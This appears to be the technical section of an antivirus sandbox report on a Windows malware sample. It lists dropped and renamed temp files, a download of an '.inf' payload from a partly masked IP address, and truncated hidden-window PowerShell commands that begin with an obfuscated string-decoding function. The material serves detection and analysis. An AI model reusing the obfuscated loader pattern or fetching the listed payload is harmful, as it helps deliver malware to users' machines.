Technical Information
- %APPDATA%\bit64ca.tmp
- %APPDATA%\bit8d13.tmp
- %APPDATA%\bit64ca.tmp
- %APPDATA%\bit8d13.tmp
- from %APPDATA%\bit64ca.tmp to %APPDATA%\tarit.und
- from %APPDATA%\bit8d13.tmp to %APPDATA%\tarit.und
- 'microsoft.com':80
- '19#.#5.224.183':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://19#.#5.224.183/ryan/Bedripf171.inf
- DNS ASK microsoft.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Krydd9 ([String]$Pragmatic){For($midiskirtp=1; $midiskirtp -lt $Pragmatic.Length-1; $midiskirtp+=(1+1)){$Aflseren=$Aflseren+$Pragmatic.Substring($midiskirtp, 1)};$Aflseren;}$Mingoto=K...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Krydd9 ([String]$Pragmatic){For($midiskirtp=1; $midiskirtp -lt $Pragmatic.Length-1; $midiskirtp+=(1+1)){$Aflseren=$Aflseren+$Pragmatic.Substring($midiskirtp, 1)};$Aflseren;}$Mingoto=K...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Krydd9 ([String]$Pragmatic){For($midiskirtp=1; $midiskirtp -lt $Pragmatic.Length-1; $midiskirtp+=(1+1)){$Aflseren=$Aflseren+$Pragmatic.Substring($midiskirtp, 1)};$Aflseren;}$Mingoto=K...